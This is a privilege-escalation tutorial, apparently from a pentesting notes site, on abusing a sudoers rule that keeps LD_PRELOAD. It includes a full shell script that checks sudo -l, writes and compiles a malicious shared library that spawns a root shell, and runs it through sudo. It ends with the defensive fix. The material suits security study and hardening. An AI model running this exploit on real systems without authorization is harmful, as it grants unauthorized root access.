Sudo + LD_PRELOAD (Shared Libraries)
This attack needs two things: a user who can run some command with sudo (any command will do) and a sudoers configuration that preserves the LD_PRELOAD environment variable across the sudo call (env_keep+=LD_PRELOAD).
Shared libraries are collections of precompiled code that can be used by multiple programs simultaneously. They provide a way to modularize code, allowing functions and data to be shared across different applications without the need to duplicate the code.
LD_PRELOAD: an environment variable, read by the dynamic loader on Unix-like systems, that names shared libraries to load before all others when a program starts. Because symbols are resolved in load order, a preloaded library can override functions from standard libraries such as libc, and any constructor code it contains runs before the program's own main().
Understanding the Context:
If a user may run a program with sudo, and that program is dynamically linked against shared libraries (practically every binary uses libc), you can use LD_PRELOAD to inject your own shared library into the root process. The library's code runs as root the moment the loader maps it, regardless of what the program itself does afterwards.
Example User
Attack Scenario
In the example above, the user dollarboysushil may run the ping command as root without entering a password (NOPASSWD).
The Defaults line also contains env_keep+=LD_PRELOAD,
which means sudo keeps the caller's LD_PRELOAD variable instead of stripping it, as it normally does for LD_* variables when env_reset is in effect.
For the attack:
We craft a malicious shared library and point the LD_PRELOAD variable at it.
Then, when we run sudo ping, sudo passes LD_PRELOAD through to the command, the dynamic loader maps our library into the root ping process, and our code runs as root.
Creating the malicious shared library
In the malicious.c file above, we first unset the LD_PRELOAD environment variable (so the shell we spawn, and everything it runs, does not load the library again), then set our gid and uid to 0 (root), and finally spawn a bash shell.
Compiling malicious.c
Here we compile malicious.c into a position-independent shared object, malicious.so, which is the form the dynamic loader can preload.
Then we run ping with sudo, with LD_PRELOAD pointing at malicious.so:
We are now root.
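The whole procedure above, as an added example that is not code from the original page: a shell script that checks both preconditions in `sudo -l` output, writes out the malicious.c the text describes (using a constructor attribute instead of a bare _init, so no special link flags are needed), compiles it, and runs the permitted command under sudo. The sample `sudo -l` output is constructed, the hostname "host" is a placeholder, and the use of gcc and the /tmp paths are assumptions.

```shell
#!/bin/sh
# Added example, not code from the original page. Walks the whole procedure:
# confirm the two preconditions from `sudo -l`, write and compile the payload,
# then run the permitted command under sudo. Assumed: gcc is installed, the
# payload lives under /tmp, and the hostname "host" below is a placeholder.
set -e

# Constructed sample of `sudo -l` output for the user in the text (not captured
# from a real system). Both preconditions are visible: env_keep+=LD_PRELOAD in
# the Defaults line and a command runnable as root.
SAMPLE_SUDO_L='Matching Defaults entries for dollarboysushil on host:
    env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD

User dollarboysushil may run the following commands on host:
    (root) NOPASSWD: /usr/bin/ping'

# Reads `sudo -l` output on stdin. Prints the command we will abuse and returns 0
# when LD_PRELOAD is preserved and some command may run as root; returns 1 otherwise.
ld_preload_vector() {
    local out cmd
    out=$(cat)
    # precondition 1: sudo keeps LD_PRELOAD instead of stripping it
    printf '%s\n' "$out" | grep -qE 'env_keep\+?=.*LD_PRELOAD' || return 1
    # precondition 2: any command runnable as root; take the first one listed,
    # dropping the "(root)" runas part, tags such as NOPASSWD:, and later commands
    cmd=$(printf '%s\n' "$out" | grep -E '^[[:space:]]*\((root|ALL)' | head -n1 \
          | sed -E 's/^[^)]*\)[[:space:]]*//; s/^([A-Z]+:[[:space:]]*)*//; s/,.*//')
    [ -n "$cmd" ] || return 1
    # when every command is allowed, any binary will do
    [ "$cmd" = ALL ] && cmd=/bin/true
    printf '%s\n' "$cmd"
}

# The malicious shared library described in the text. The constructor runs when
# the loader maps the library into the root process, before ping's main(): it
# unsets LD_PRELOAD so the spawned shell does not reload us, becomes uid/gid 0
# and spawns bash.
write_payload() {
    cat > "$1" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

__attribute__((constructor))
static void init(void)
{
    unsetenv("LD_PRELOAD");   /* keep the shell and its children from re-loading us */
    setgid(0);
    setuid(0);
    system("/bin/bash -p");
}
EOF
}

# Compile into a position-independent shared object.
build_payload() {
    gcc -fPIC -shared -o "$2" "$1"
}

# Run the permitted command with LD_PRELOAD set. sudo accepts VAR=value before
# the command and lets this one through because env_keep lists LD_PRELOAD. ping
# with no arguments would only print usage, but our constructor runs before that.
exploit() {
    sudo LD_PRELOAD="$2" "$1"
}

# Stand-alone usage: sh ldpreload_sudo.sh run
if [ "${1:-}" = "run" ]; then
    target=$(sudo -l | ld_preload_vector) || { echo "preconditions not met" >&2; exit 1; }
    write_payload /tmp/malicious.c
    build_payload /tmp/malicious.c /tmp/malicious.so
    exploit "$target" /tmp/malicious.so
fi
```

Two caveats worth checking before relying on this. The loader honours LD_PRELOAD here only because sudo starts ping with real and effective uid both 0; a setuid binary run directly (real uid different from effective uid) is in secure-execution mode and glibc ignores LD_PRELOAD. And the fix on the defending side is simply to drop env_keep+=LD_PRELOAD from sudoers: with the default env_reset, sudo strips LD_* variables and this vector disappears.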
Watch this excellent video by conda: https://youtu.be/bzjnIi5u9OQ?list=PLDrNMcTNhhYrBNZ_FdtMq-gLFQeUZFzWV